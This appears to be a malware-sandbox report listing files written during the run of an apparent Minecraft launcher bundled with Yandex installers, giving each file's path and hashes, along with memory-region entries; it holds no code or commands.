SHA256 d53a32e1246771ec2f6ad2c3ce6f718dfa317109775a73174aebd86f739299c5
SHA512 4f28b2628249b999b79203969b08ea2130fc29fbe84237aa12c81c51970f6304d3264f32fb9b9b34ab5d277c3f0e8428345c35326e8fec9686c11a9603670425

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 fe05b740f8a42c496e25440665d0d3f1
SHA1 939a623260bd0a77896d71d57e231eb64256454a
SHA256 4a438ee4662260d9bad67d9ed4fe2de67edfada3eed01704c7098d1f74eba993
SHA512 7b8be23516ee4071fd3a589466a07536ec82c7b520af90d6ff33c02ad186dfc2d7dbd13ad389e0c717cc5cb1d64caa7c364ca6206938ff002c71265d557d73cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ce0358034ad0d9e9e6b694595d9b6aa
SHA1 e5c2a89e2230fa220f9fde10feb86724e6ac9b6c
SHA256 b60b8ee859546b65e280c798830fe64f91ab6e365c9a81b1f4de5939ccdb4370
SHA512 6e29e8fb2b6c440e975c2394272eb9de781e24a0ee0c5b4195fee227744cee57a870bf04cfc145fff94b06a4f3a4a0bf6633ab76e199be926663376daed25127

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

MD5 3fb846d3691f3d98a34e669e1b9b5bf6
SHA1 4c90c2912aae3b8da4c44a4faa0b8df20525285f
SHA256 ead7a779cabae642d09be07283cc99e53c84ecf90349444e0d0ac4bf9901fe47
SHA512 e904ecfa7b1c9ba066272bf91b8341bf3877310613370defabee7db58ea825c52582353e97f9398d706d3f3890b3701a1c05fe202e8a87499fb9600f87176b3e

C:\Users\Admin\AppData\Local\Temp\YandexSearch00000.log

MD5 966b237be74cd73151e8bf351e98668d
SHA1 ff79c524c53895e7ca4b531da5fd43978d190557
SHA256 6fc21d359d992c40dc8e4c6565a5019fc75057585a201f345d1338a3995e08c9
SHA512 db04b7f03d346870753ff3486e4981019be5d7e3bc1b1304f2ff85674afe1fd833de0347ab8480c909e7189ac31800ce43daecdec2f91d987e255cfdac3196a0

C:\Users\Admin\AppData\Local\Temp\{5B964E0E-B9A3-4276-9ED9-4D5A5720747A}\YandexSearch.msi

MD5 561f202d40eb1a21aa947b2b833f6928
SHA1 b48e2f49a416847aa9420ed4b360841e8c28f67b
SHA256 b2fda5fb2d8e65fc0448d308647d8afd1e4ecd7bff0103ec3700e0798a7db0a3
SHA512 66d172f336ef0b4790e2141711f205682a0ba6ced8d03f26e33b54f6ea1e29be10d387e843df26d1110559888b09a3cdf9198ea40f17ca9d2ac1872c1da82063

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4ef79103cc1af90c6e30132516972044
SHA1 1e45c1db681a0a959578f18167d4064e511c77d9
SHA256 5218e58bb49a72454a74bc44c054eb1ddfb596a95e0111b89c6967e4375f7a52
SHA512 52dabd7b42e1696fa6e9a662a2ebfabc5012e0d11a3c6b92b9170b183ae42d247a18af6acd2f6d9568338fe50305eb90e02934133be6ecca12b7d82f56d7ed61

memory/1568-795-0x0000000000A00000-0x0000000001245000-memory.dmp

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\plugin2\msvcp140.dll

MD5 bf78c15068d6671693dfcdfa5770d705
SHA1 4418c03c3161706a4349dfe3f97278e7a5d8962a
SHA256 a88b8c1c8f27bf90fe960e0e8bd56984ad48167071af92d96ec1051f89f827fb
SHA512 5b6b0ab4e82cc979eaa619d387c6995198fd19aa0c455bef44bd37a765685575d57448b3b4accd70d3bd20a6cd408b1f518eda0f6dae5aa106f225bee8291372

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140.dll

MD5 7415c1cc63a0c46983e2a32581daefee
SHA1 5f8534d79c84ac45ad09b5a702c8c5c288eae240
SHA256 475ab98b7722e965bd38c8fa6ed23502309582ccf294ff1061cb290c7988f0d1
SHA512 3d4b24061f72c0e957c7b04a0c4098c94c8f1afb4a7e159850b9939c7210d73398be6f27b5ab85073b4e8c999816e7804fef0f6115c39cd061f4aaeb4dcda8cf

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140_1.dll

MD5 fcda37abd3d9e9d8170cd1cd15bf9d3f
SHA1 b23ff3e9aa2287b9c1249a008c0ae06dc8b6fdf2
SHA256 0579d460ea1f7e8a815fa55a8821a5ff489c8097f051765e9beaf25d8d0f27d6
SHA512 de8be61499aaa1504dde8c19666844550c2ea7ef774ecbe26900834b252887da31d4cf4fb51338b16b6a4416de733e519ebf8c375eb03eb425232a6349da2257

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\deploy\messages_zh_TW.properties

MD5 880baacb176553deab39edbe4b74380d
SHA1 37a57aad121c14c25e149206179728fa62203bf0
SHA256 ff4a3a92bc92cb08d2c32c435810440fd264edd63e56efa39430e0240c835620
SHA512 3039315bb283198af9090bd3d31cfae68ee73bc2b118bbae0b32812d4e3fd0f11ce962068d4a17b065dab9a66ef651b9cb8404c0a2defce74bb6b2d1d93646d5

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\images\cursors\win32_CopyNoDrop32x32.gif

MD5 1e9d8f133a442da6b0c74d49bc84a341
SHA1 259edc45b4569427e8319895a444f4295d54348f
SHA256 1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b
SHA512 63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\security\policy\unlimited\US_export_policy.jar

MD5 12f971b6e65cbc7184701235469f0339
SHA1 06cb165157c5e0078b872c48707a1328b1dcba19
SHA256 84e035372ca8979bb4a387428a74942ffc7248a0e61988b7033b5b266cd187c8
SHA512 58646fc81de2e4750a3259d79a207a8cff2dc6692f178a63d92a453fc408c8d1088007ef4e93157d1017be706565716a0236039dbac848c40745a0ad89c4d0de

\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

MD5 82345958a39e7b1ad0b14ff2adeecaf9
SHA1 56e29f91f3ca1d5a3712e339ea5ac70f2904fbf7
SHA256 5fdc5fd46f4fbd5f1377c9cde1370b34bef76aec16f7ac3bcb89a1ee59329f99
SHA512 1182da48e1be07c2b21036336446e4af55dfc4f4fd1602701cf2a2c56ead437d9be5d994948f7b863215cffe1b627ff4331e4635db12f9eaf9d6ea7b6bf98ea2

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.dll

MD5 583e8b42864ec183c945164f373cb375
SHA1 5ec118befbb5d17593a05db2899ee52f7267da37
SHA256 9bc9178d3f4246433fe209a0f5ca70e77568e80c928268c78f8c8b00107ce6ed
SHA512 1feaac37bac19bde93171ebda2e76a65e9d5472a503b05939f6977b3a4d94d131298f3989dd048d7617ecd69cf09db7ac986fc39f0df9f56c84ea01726d0c898

\Windows\Installer\MSIE202.tmp

MD5 0c80a997d37d930e7317d6dac8bb7ae1
SHA1 018f13dfa43e103801a69a20b1fab0d609ace8a5
SHA256 a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86
SHA512 fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\ucrtbase.DLL

MD5 849959a003fa63c5a42ae87929fcd18b
SHA1 d1b80b3265e31a2b5d8d7da6183146bbd5fb791b
SHA256 6238cbfe9f57c142b75e153c399c478d492252fda8cb40ee539c2dcb0f2eb232
SHA512 64958dabdb94d21b59254c2f074db5d51e914ddbc8437452115dff369b0c134e50462c3fdbbc14b6fa809a6ee19ab2fb83d654061601cc175cddcb7d74778e09

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-processthreads-l1-1-1.dll

MD5 7e8b61d27a9d04e28d4dae0bfa0902ed
SHA1 861a7b31022915f26fb49c79ac357c65782c9f4b
SHA256 1ef06c600c451e66e744b2ca356b7f4b7b88ba2f52ec7795858d21525848ac8c
SHA512 1c5b35026937b45beb76cb8d79334a306342c57a8e36cc15d633458582fc8f7d9ab70ace7a92144288c6c017f33ecfc20477a04432619b40a21c9cda8d249f6d

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-file-l2-1-0.dll

MD5 721b60b85094851c06d572f0bd5d88cd
SHA1 4d0ee4d717aeb9c35da8621a545d3e2b9f19b4e7
SHA256 dac867476caa42ff8df8f5dfe869ffd56a18dadee17d47889afb69ed6519afbf
SHA512 430a91fcecde4c8cc4ac7eb9b4c6619243ab244ee88c34c9e93ca918e54bd42b08aca8ea4475d4c0f5fa95241e4aacb3206cbae863e92d15528c8e7c9f45601b

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-timezone-l1-1-0.dll

MD5 91a2ae3c4eb79cf748e15a58108409ad
SHA1 d402b9df99723ea26a141bfc640d78eaf0b0111b
SHA256 b0eda99eabd32fefecc478fd9fe7439a3f646a864fdab4ec3c1f18574b5f8b34
SHA512 8527af610c1e2101b6f336a142b1a85ac9c19bb3af4ad4a245cfb6fd602dc185da0f7803358067099475102f3a8f10a834dc75b56d3e6ded2ed833c00ad217ed

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-stdio-l1-1-0.dll

MD5 55b2eb7f17f82b2096e94bca9d2db901
SHA1 44d85f1b1134ee7a609165e9c142188c0f0b17e0
SHA256 f9d3f380023a4c45e74170fe69b32bca506ee1e1fbe670d965d5b50c616da0cb
SHA512 0cf0770f5965a83f546253decfa967d8f85c340b5f6ea220d3caa14245f3cdb37c53bf8d3da6c35297b22a3fa88e7621202634f6b3649d7d9c166a221d3456a5

memory/1568-2033-0x0000000000A00000-0x0000000001245000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vendor00000.xml

MD5 a96e6071a17b74bbd309bf696496b8f7
SHA1 63c1ecf860504d390b6f3a32982ddd8946b042c5
SHA256 1a855972dc308e47d30d567e1b37fdad349bf555b971bc14ead76e17a8accccc
SHA512 2c906e2f11d62d1336be482cc5ff784bf372cc7afb3263754e7810a1ae27e253aa9e22463456b62a25049d33ba1e69f129ed7e0a0273fe928dcaa216b7876449

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-convert-l1-1-0.dll

MD5 4ec4790281017e616af632da1dc624e1
SHA1 342b15c5d3e34ab4ac0b9904b95d0d5b074447b7
SHA256 5cf5bbb861608131b5f560cbf34a3292c80886b7c75357acc779e0bf98e16639
SHA512 80c4e20d37eff29c7577b2d0ed67539a9c2c228edb48ab05d72648a6ed38f5ff537715c130342beb0e3ef16eb11179b9b484303354a026bda3a86d5414d24e69

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-string-l1-1-0.dll

MD5 9b79965f06fd756a5efde11e8d373108
SHA1 3b9de8bf6b912f19f7742ad34a875cbe2b5ffa50
SHA256 1a916c0db285deb02c0b9df4d08dad5ea95700a6a812ea067bd637a91101a9f6
SHA512 7d4155c00d65c3554e90575178a80d20dc7c80d543c4b5c4c3f508f0811482515638fe513e291b82f958b4d7a63c9876be4e368557b07ff062961197ed4286fb

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-heap-l1-1-0.dll

MD5 8906279245f7385b189a6b0b67df2d7c
SHA1 fcf03d9043a2daafe8e28dee0b130513677227e4
SHA256 f5183b8d7462c01031992267fe85680ab9c5b279bedc0b25ab219f7c2184766f
SHA512 67cac89ae58cc715976107f3bdf279b1e78945afd07e6f657e076d78e92ee1a98e3e7b8feae295af5ce35e00c804f3f53a890895badb1eed32377d85c21672b9

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-file-l1-2-0.dll

MD5 5a72a803df2b425d5aaff21f0f064011
SHA1 4b31963d981c07a7ab2a0d1a706067c539c55ec5
SHA256 629e52ba4e2dca91b10ef7729a1722888e01284eed7dda6030d0a1ec46c94086
SHA512 bf44997c405c2ba80100eb0f2ff7304938fc69e4d7ae3eac52b3c236c3188e80c9f18bda226b5f4fde0112320e74c198ad985f9ffd7cea99aca22980c39c7f69

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-localization-l1-2-0.dll

MD5 1ed0b196ab58edb58fcf84e1739c63ce
SHA1 ac7d6c77629bdee1df7e380cc9559e09d51d75b7
SHA256 8664222823e122fca724620fd8b72187fc5336c737d891d3cef85f4f533b8de2
SHA512 e1fa7f14f39c97aaa3104f3e13098626b5f7cfd665ba52dcb2312a329639aaf5083a9177e4686d11c4213e28acc40e2c027988074b6cc13c5016d5c5e9ef897b

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-runtime-l1-1-0.dll

MD5 f1a23c251fcbb7041496352ec9bcffbe
SHA1 be4a00642ec82465bc7b3d0cc07d4e8df72094e8
SHA256 d899c2f061952b3b97ab9cdbca2450290b0f005909ddd243ed0f4c511d32c198
SHA512 31f8c5cd3b6e153073e2e2edf0ca8072d0f787784f1611a57219349c1d57d6798a3adbd6942b0f16cef781634dd8691a5ec0b506df21b24cb70aee5523a03fd9

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\server\jvm.dll

MD5 36e3e370db5f0b66689811b41f1a8445
SHA1 7fcbe290c3a6a0827b77af78115a1b4bc834d685
SHA256 9f28a06990d2ed1d14130072109e37e733b3a7d4922e325e679dd4d917741550
SHA512 f93bc4ca946e383ee1edfef3c7b5574585d23d660a4cc3db5b6b203f6111a3fe1f245d583ca53852888ac67812fb6efd0d121d0643180875baeb0d7b811d4db9

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\amd64\jvm.cfg

MD5 499f2a4e0a25a41c1ff80df2d073e4fd
SHA1 e2469cbe07e92d817637be4e889ebb74c3c46253
SHA256 80847ed146dbc5a9f604b07ec887737fc266699abba266177b553149487ce9eb
SHA512 7828f7b06d0f4309b9edd3aa71ae0bb7ee92d2f8df5642c13437bba2a3888e457dc9b24c16aa9e0f19231530cb44b8ccd955cbbdf5956ce8622cc208796b357d

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

MD5 122e34bfa3146ef9ae5a51fdc744353f
SHA1 f0cc2294fe150a4cceca8a3da8615edcc4eb20e4
SHA256 dd2169db3358ccdf4a4a185e4a22955c989eaa3b9d3e0e6025599b8fa173c968
SHA512 306341e00598f02a70d3edc6ef666cb64982f1e31e5c0a1304977a1700c95395c1c7f0857ae8056853370eced0bd2aeafc72da804a65f98c1422929b7c431700

memory/348-2066-0x0000000000140000-0x0000000000141000-memory.dmp

memory/868-2081-0x0000000000400000-0x000000000042F000-memory.dmp

memory/796-2215-0x0000000002080000-0x000000000208A000-memory.dmp

memory/796-2214-0x0000000002080000-0x000000000208A000-memory.dmp

memory/796-2213-0x0000000002080000-0x000000000208A000-memory.dmp

C:\Config.Msi\f76bc32.rbs

MD5 e4d259b8dc0b03020b1ddfa2b8e26653
SHA1 3c9e1f6fb89f84c2216ac610036ab460fb647987
SHA256 e2b1c5d02f71c528814884677885d64cc07bd4da17417d0371e5ef8e15b65a27
SHA512 6d538ce1852fb18d82b6d71230bf8dd2403ae7ac8d80af33912a1bc72d52dafd3342cebc2d45d1d0e3c316ad5fa22a8dbc6d34a593079422b2cf0a8a5b485ffc

memory/796-2219-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-2212-0x0000000002080000-0x000000000208A000-memory.dmp

memory/796-2209-0x0000000001F30000-0x0000000001F31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OMNIJA~1.ZIP

MD5 b6290143f19876d1a412ec6e9f835c14
SHA1 4fa4ae1c8984b35987ef17f69a94646b2b0a6bb2
SHA256 3b8867f3a7eebfa5a33ce3286bbe568ec18da28bee72f7e7b28368c000d78438
SHA512 afff382a44e821fa84560a36ffef8fb6031a7ad1ac9e6e0fa59938c667676945845a55eb373f2139369dc52e000d63e33e8df52f5d4daeaf869e6d9576abb034

memory/796-6416-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-10206-0x0000000001F30000-0x0000000001F31000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9bot8sq2.Admin\places.sqlite-20240623215559.061800.backup

MD5 314cb7ffb31e3cc676847e03108378ba
SHA1 3667d2ade77624e79d9efa08a2f1d33104ac6343
SHA256 b6d278384a3684409a2a86f03e4f52869818ce7dd8b5779876960353f7d35dc1
SHA512 dc795fa35ea214843a781ee2b2ef551b91b6841a799bef2c6fb1907d90f6c114071a951ebb7b2b30e81d52b594d447a26ab12ddb57c331e854577d11e5febef5

memory/796-10181-0x0000000001F30000-0x0000000001F31000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9bot8sq2.default-release\thumbnails\ba433b350a0a2613ceeb89a6c66e8da6

MD5 e05d28ab78d61968a7132eafe61f54b4
SHA1 dcf260ab7cdea7b6fc934e54765c964c1a20bd36
SHA256 cbd302b0ea2218f495b9f0a814f34733f2c5f13a6634d74c6e85a5c0863b5621
SHA512 ebea612bf803692fa3c7b2573c58f2e43fba0f7039e01b57203978cf69b6f8ca538b563791a760a7e901bb5e392879bd57bdbdb69b6a3781a3886fc0c01eddc0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9bot8sq2.default-release\thumbnails\68f79a69daa8bcc89cc24690c2324c3b

MD5 af80a936c10e18de168538a0722d6319
SHA1 9b1c84a1cf7330a698c89b9d7f33b17b4ba35536
SHA256 2435c0376fca765b21d43e897f4baa52daa0958a7015d04103488c606c99d1d3
SHA512 9a1325c8ce05806e5c161a4cf47239f62baad8f79650fbd713e74928fce8171ced10ba7f24fac46c548e1dbf3f64106270cb25ca88c836c870107f5dc1f97879

memory/796-10284-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-10278-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-10263-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-10255-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-10253-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-10315-0x0000000001F30000-0x0000000001F31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\+JXF2465299824772532332.tmp

MD5 99c471b10eb25b8f0f1fe76a04926b0f
SHA1 807f89e70ccf186bde048c8a51a5c2d668190797
SHA256 9042ee73964614ed6b3eb4aa30df23c4ac5d3372deffb201ab9287540a34079c
SHA512 cbc263c2fbf1325c56adb312be8026ec25766a172bfd8d742a2e86292692c18fb185f595eb8b6fa2898e66ff95404ae52d9e52c393271e9f1fbbfd6c5bb9707d

C:\Users\Admin\AppData\Local\Temp\+JXF7432461699662347372.tmp

MD5 794162f5ab873e624c2e8adaef34aa73
SHA1 5e631244b866752f9232e170ed81ab94d252ac42
SHA256 b272fda2af48d26da480cd02d76059416539612615d38b9145b3f156d677ef7c
SHA512 d14a8abf8a3a4279652132ec145c5fad024001241e6c81d1e07c74ad3d438d61ea6f2e2a3d01812621763afbda99486ebe47f858a8dbd440c82448b1619a2426

C:\Users\Admin\AppData\Local\Temp\+JXF1594021999544664996.tmp

MD5 945426f5363c482553695c661ebc75a0
SHA1 feb3a62b783c6cba5175e957c6a4d1564e6de534
SHA256 b04761b165a8b32e5ac989a3cee07f27658634e7796f708b3e17ff5ccbe23622
SHA512 12658f86b8c3744329c2a4c4552ce25c5756e29aa984e0c7fd3fdee13abaa51b221d8ff78a9c406b084d3c08fffc3cdcb2b58f9cfb6af707ab9e3bc8fcee9e98

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Services\www.ya.ru.ico

MD5 a6f6261de61d910e0b828040414cee02
SHA1 d9df5043d0405b3f5ddaacb74db36623dd3969dc
SHA256 6bb91f1d74389b18bce6e71772e4c5573648c1a4823338193f700afdf8216be5
SHA512 20cb7b646c160c942e379c6e7a1a8981a09f520361c0205052c1d66e2fdb76333ffaaf0ca1dfc779754f0e844b9946900fbd5690d01869e1607abc1fda6dffab

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences-20240623215600.459800.backup

MD5 af006f1bcc57b11c3478be8babc036a8
SHA1 c3bb4fa8c905565ca6a1f218e39fe7494910891e
SHA256 ed6a32e11cc99728771989b01f5ae813de80c46a59d3dc68c23a4671a343cb8c
SHA512 3d20689b0f39b414349c505be607e6bfc1f33ac401cf62a32f36f7114e4a486552f3e74661e90db29402bb85866944e9f8f31baba9605aa0c6def621511a26af

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks-20240623215600.459800.backup

MD5 3adec702d4472e3252ca8b58af62247c
SHA1 35d1d2f90b80dca80ad398f411c93fe8aef07435
SHA256 2b167248e8136c4d45c2c46e2bff6fb5e5137dd4dfdccde998599be2df2e9335
SHA512 7562e093d16ee6305c1bb143a3f5d60dafe8b5de74952709abc68a0c353b65416bf78b1fa1a6720331615898848c1464a7758c5dfe78f8098f77fbfa924784c0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

MD5 e9f8dc645f24212e3a6a0e17a9b3f8a0
SHA1 28cefae18c56e194da88353557f3a453281d54a8
SHA256 fd257ef82dd4ab28c302c42b6623aae32fd18c0da806821251cdf9f6c172d9fd
SHA512 a7da60b3202b73a703c55dff4d12438447c93c897dcbbae2b1b6062177c92442e69e135cd647ce26f20af28340bcedbec44f21b09434280b51001e055d827724

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk

MD5 310697893102d67491def0c5571390f6
SHA1 9536c2073b02acf6e7278cadc88ac12cdee12566
SHA256 bc66265afb76954ea63956e5a8a19f3f3bc3752166d6ccc9760816b6d26c79b5
SHA512 360c4d3ad206d3ed75ab140dcb8b7f06076284806b36b8d2a8c912bc85b1542a09c569aa352270ab166cc3bf4564c5804c2104e5288719da090b316382b18385

C:\Users\Admin\AppData\Local\Yandex\YaPin\Яндекс.website

MD5 d2fdab99df8a05cb2233b2b190fedbca
SHA1 3303cd68c1732e6cde273faa7789cff16f526aee
SHA256 c4a08741f47df82e576f3cedc286d0dd8698a38c0967d4a9eaf1c7ddc02817cc
SHA512 59eea6dd75c1987e7c2627f22be86a8521afbdde7c08b41a167241d98ec7717683ac4ca3db86a75220193f5ba9fd5ef8ce86d9a5a8cf7df43fa3f8ff090fcc0c

memory/796-10421-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/796-10418-0x0000000001F30000-0x0000000001F31000-memory.dmp

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe

MD5 1562e15220d8771fcb11b9a5b234a970
SHA1 50ec8e4e7125bda147a1b2ccc2b2827db2dc3479
SHA256 366199821c1efede3f7112d21da045fd6bf38b56fb3da1ae9d6493c4ddc1861f
SHA512 a07873f0a5381d202a6439a3245dd51f405cdcec4a9d40ff6ffdd4670a3b218008f7288a89e2a7455782c677d4c661bda96e62f813ce7d8c1f20a6c4c7c2b31f

C:\Users\Admin\AppData\Roaming\.minecraft\klauncher.json

MD5 b734dcb1de24f851dbd9bbc3580195ea
SHA1 bf47665415a9e2020f761e46a294927316a49679
SHA256 1301d3d76958673b6f6fa865f5dcb47e3b851ac045bd32d06c2a073997a44f1a
SHA512 44915d73d61ae7c33b523e7162745820670d03d0d1e40e822ffd6f5af220141b7801e66d2cb12198c4084a8401786206280e68f48e14c294ed6250f0842836af

memory/796-10824-0x0000000002080000-0x000000000208A000-memory.dmp

memory/796-10827-0x0000000002080000-0x000000000208A000-memory.dmp

memory/796-10826-0x0000000002080000-0x000000000208A000-memory.dmp

memory/796-10825-0x0000000002080000-0x000000000208A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe

MD5 bf2e1399a1e08ae36658b0aaa7fd5a99
SHA1 4d233713a23a77309a9470e13ae82c2a83cd8ae8
SHA256 c816c0bc31ab41c33f58bc4d3fbabd32bb4e06c7a0044d21a5e626f6bbfb9809
SHA512 8cbd230ebefbbd8a12780b60dff83a8543369e851ffc97fa2d5480432e69247eda671ba01a1200dd0adeae4aeb2518322e0564852a599f2c871aa440c0ee192c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9116a6b807f784b3071e457645d9d354
SHA1 9fbb28ac0d62e2a3f60013ffff2e5dfd6b985f96
SHA256 9fc5eb98cfcdcf85e4833f0e8b62b0ef1f019c4c653a85e1019aadfe6291971b
SHA512 d96823d6e636602b31ae23730f8dc29e4ec030d3c2dea2d34b1dea1773f260568e34d9aae65cab934a2dfb0f83c9f19d401c440a6b84dadfb7449c61ca1057b5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 adcf509412af68bdac89c2e0c5c3e87b
SHA1 c707b3415023f1465e99a93b91701593a9938869
SHA256 5bcb70aef82348e1779541bf07daeca6ab7a79067599c2059a348e7b800dbc24
SHA512 cc5c37a5bbef41d51d0e212b2f982d867558e72612831d581460333c9c049cad1ea27c4582c960680f07e15b14ec72fb76599b7a2cb833b48965547b37ef8ab3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f344d2e972bd66962f5b67ae7deded5c
SHA1 72d09c55e34fa27152d5095e60722332d11586de
SHA256 58400f611db211ab4689e945cce1731d8116d9ef2b36d5818f6725b80c24ab22
SHA512 5767df03597d619eb53f7a4ae195ac3b2fff12a29b63ca2cd5beaec53ddac7141c1df82233480e805c58e317902e7b8cb5e6297ca6600a3a355f8cade816f21b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 f04df49b6ae85bfde788624223be9966
SHA1 ce2f041307f0fc4e4132bee039981fe25872d6f1
SHA256 2c5f08f8a268709d24cd937ae96f936fe0d0659f4015a2a78dc81515c078dc69
SHA512 5bc03fc482492186fa51c214b56facb97d8dbcbc3bf5f89cf2fde51d63395f5273e375d0d3d21f1045cd4438c3c4630d12325987c939f8c2848023ce9aecb12d

C:\Users\Admin\AppData\Local\Temp\lite_installer.log

MD5 80f7adc41431eb6ea43be821a956d78e
SHA1 bbf1a4a0577ffe7383e4fe0620ec1254a774766a
SHA256 850110e1974871753233fb292c8aa4f6f01990e84d0c54d2095b31b68322a973
SHA512 30737494c6035a3f9f8e2c032a0de4acd522c6edc2f5a37e8c5f934e3d6ee686bd55748045d0df8e389280bb47a99aec4479bd90df8320fcddb86673d7f91040

C:\Users\Admin\AppData\Local\Temp\master_preferences

MD5 5c627a0acb0b4aa6850222290d1b9b30
SHA1 dc52e262636616c0524a08bbbffb62a8b9eab9ce
SHA256 15cbe382487e05ebc052b8ae3155e4ffbbb515bce90a76f15cda47e076a037d1
SHA512 6250e074b4d65e19ef50b1d7389af8e4ae7b97a47582c774c6dded0a5bde2919236cf991a0652d42e042392582e1a92adca9094f5b32015166ffd8b0f2ee7920

C:\Users\Admin\AppData\Local\Temp\+JXF3015876882171906206.tmp

MD5 a3de2170e4e9df77161ea5d3f31b2668
SHA1 6484f1af6b485d5096b71b344e67f4164c33dd1f
SHA256 7b5a4320fba0d4c8f79327645b4b9cc875a2ec617a557e849b813918eb733499
SHA512 94a693ab2ce3c59f7a1d35b4bcc0fd08322dad24ce84203060ceceaf3dac44c4c28413c28dcdab35d289f30f8e28223a43c11cb7d5e9a56d851eb697ff9b9b6b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\configs\all_zip

MD5 33b0f0599e46c248c6e7f41553fa707c
SHA1 90305d5f8c31a1ffbbff50a4fdbd4ae54b610298
SHA256 c5591c1f105ac121858c10df3cf71b75c7bb671f187b837bac17959d94578f3d
